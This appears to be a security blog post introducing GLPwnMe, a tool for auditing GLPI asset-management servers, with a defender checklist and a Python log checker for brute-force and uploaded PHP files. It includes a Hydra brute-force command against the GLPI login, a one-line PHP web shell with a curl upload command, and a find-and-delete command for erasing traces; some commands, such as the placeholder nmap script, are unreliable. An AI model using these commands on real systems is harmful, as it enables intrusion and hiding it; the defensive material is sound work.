Orange Cyberdefense recently released GLPwnMe, an open-source tool designed to audit and test the security of GLPI environments. GLPI, a widely used IT asset management solution, often suffers from poor patch management, weak architecture, and misconfigurations, making it a prime target for attackers.
GLPwnMe provides a comprehensive approach to assessing GLPI instances by:
– Discovering exposed GLPI instances
– Scanning for common vulnerabilities
– Brute-forcing default credentials
– Uploading PHP files (if permissions allow)
– Supporting custom exploit integration
A key ethical feature is the log.glpwnme file, which tracks actions for post-exploitation cleanup and accountability. Some modules even include an auto-cleaner to remove traces after testing.
## **You Should Know: Essential Commands & Techniques for GLPI Security Testing**
### **1. Discovering GLPI Instances**
Use Shodan or Censys to find exposed GLPI instances:
```shell
shodan search http.title:"GLPI"
censys search "services.http.response.html_title: GLPI"
```
### **2. Scanning for Vulnerabilities**
Run **Nmap** to check for outdated versions:
```shell
nmap -sV --script http-vuln-cve2019-XXXX <target_IP>
```
### **3. Brute-Forcing Default Credentials**
Use **Hydra** for credential testing:
```shell
hydra -L users.txt -P passwords.txt <target_IP> http-post-form "/glpi/front/login.php:login_name=^USER^&login_password=^PASS^&submit=Connect:Invalid credentials"
```
### **4. Exploiting File Upload Vulnerabilities**
If file upload is possible, test with a simple PHP shell:
```php
<?php system($_GET['cmd']); ?>
```
Upload via curl:
```shell
curl -F "<field>=@<file>" -F "submit=Upload" http://<target_IP>/glpi/front/document.send.php
```
(The form field name and file name were lost in the original page; `<field>` and `<file>` are placeholders.)
### **5. Post-Exploitation Cleanup**
Check and delete traces. Note that the command below removes every PHP file under the GLPI webroot modified in the last 24 hours, including legitimate files touched by a recent GLPI update, so narrow the path to the directory you actually wrote to before running it:
```shell
find /var/www/html/glpi -name "*.php" -mtime -1 -exec rm -f {} \;
```
## **What Undercode Say**
GLPI, like many IT management tools, is often deployed without proper hardening, making it an easy entry point for attackers. GLPwnMe simplifies vulnerability assessment, but ethical use is critical—always log and clean up after testing.
For defenders:
- Patch GLPI regularly (`apt update && apt upgrade glpi`)
- Restrict file uploads (modify `.htaccess` or PHP config)
- Monitor logs (`tail -f /var/log/apache2/glpi_access.log`)
- Disable default credentials: change the passwords of the built-in accounts (the default super-admin account is `glpi`, not `admin`) from the GLPI interface, or directly in the database, where the table is `glpi_users` (`mysql -e "UPDATE glpi.glpi_users SET password=MD5('NewSecurePass123') WHERE name='glpi';"`). An MD5 hash is weak; passwords set through the GLPI interface are stored with PHP `password_hash`, so prefer that route.
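As an added example for the "Monitor logs" item (not part of the original post or the GLPwnMe project), a small Python checker that runs over Apache access-log lines and flags two patterns this post describes: a burst of POSTs to `/glpi/front/login.php` from one address, and a POST to `document.send.php` followed by a request for a `.php` file under `/glpi/files/`. The log format, field names, threshold and sample lines are assumptions constructed for the example; `/glpi/files/` being web-reachable is the misconfiguration the post warns about, not GLPI's intended layout.

```python
import re
from collections import Counter, defaultdict

# Apache "combined" log format; the group names are this example's own.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
LOGIN_PATH = "/glpi/front/login.php"           # endpoint hit by the hydra command above
UPLOAD_PATH = "/glpi/front/document.send.php"  # endpoint hit by the curl upload above
FILES_PREFIX = "/glpi/files/"                  # assumption: uploads land here and it is web-reachable

def parse(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_bruteforce(lines, threshold=5):
    """IPs with at least `threshold` POSTs to the login form (a hydra-style burst)."""
    posts = Counter()
    for rec in filter(None, map(parse, lines)):
        if rec["method"] == "POST" and rec["path"].split("?")[0] == LOGIN_PATH:
            posts[rec["ip"]] += 1
    return sorted(ip for ip, n in posts.items() if n >= threshold)

def find_webshell_upload(lines):
    """IPs that POST to the upload endpoint and later request a .php file under FILES_PREFIX."""
    uploaders, hits = set(), defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        path = rec["path"].split("?")[0]
        if rec["method"] == "POST" and path == UPLOAD_PATH:
            uploaders.add(rec["ip"])
        elif rec["ip"] in uploaders and path.startswith(FILES_PREFIX) and path.endswith(".php"):
            hits[rec["ip"]].append(rec["path"])
    return dict(hits)

# Constructed sample traffic (not real logs): a five-attempt burst from 10.0.0.7, and a normal
# login from 10.0.0.9 followed by an upload and a request for the uploaded PHP file.
BRUTE = '10.0.0.7 - - [01/Jan/2024:10:00:0{i} +0000] "POST /glpi/front/login.php HTTP/1.1" 200 512'
SAMPLE_LOG = [BRUTE.format(i=i) for i in range(5)] + [
    '10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "POST /glpi/front/login.php HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:01:05 +0000] "POST /glpi/front/document.send.php HTTP/1.1" 200 88',
    '10.0.0.9 - - [01/Jan/2024:10:01:09 +0000] "GET /glpi/files/_tmp/uploaded.php?cmd=id HTTP/1.1" 200 41',
]

if __name__ == "__main__":
    print("login brute-force from:", find_bruteforce(SAMPLE_LOG))
    print("PHP upload then execution by:", find_webshell_upload(SAMPLE_LOG))
```

To use it on a real server, replace `SAMPLE_LOG` with the lines of `/var/log/apache2/glpi_access.log`; the threshold should be tuned to the normal failed-login rate of the deployment.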
## **Expected Output:**
A structured security report with:
- List of exposed GLPI instances
- Identified vulnerabilities (CVE references if available)
- Successful/failed login attempts
- Post-exploitation cleanup confirmation
Reported By: Kondah Lors – Hackers Feeds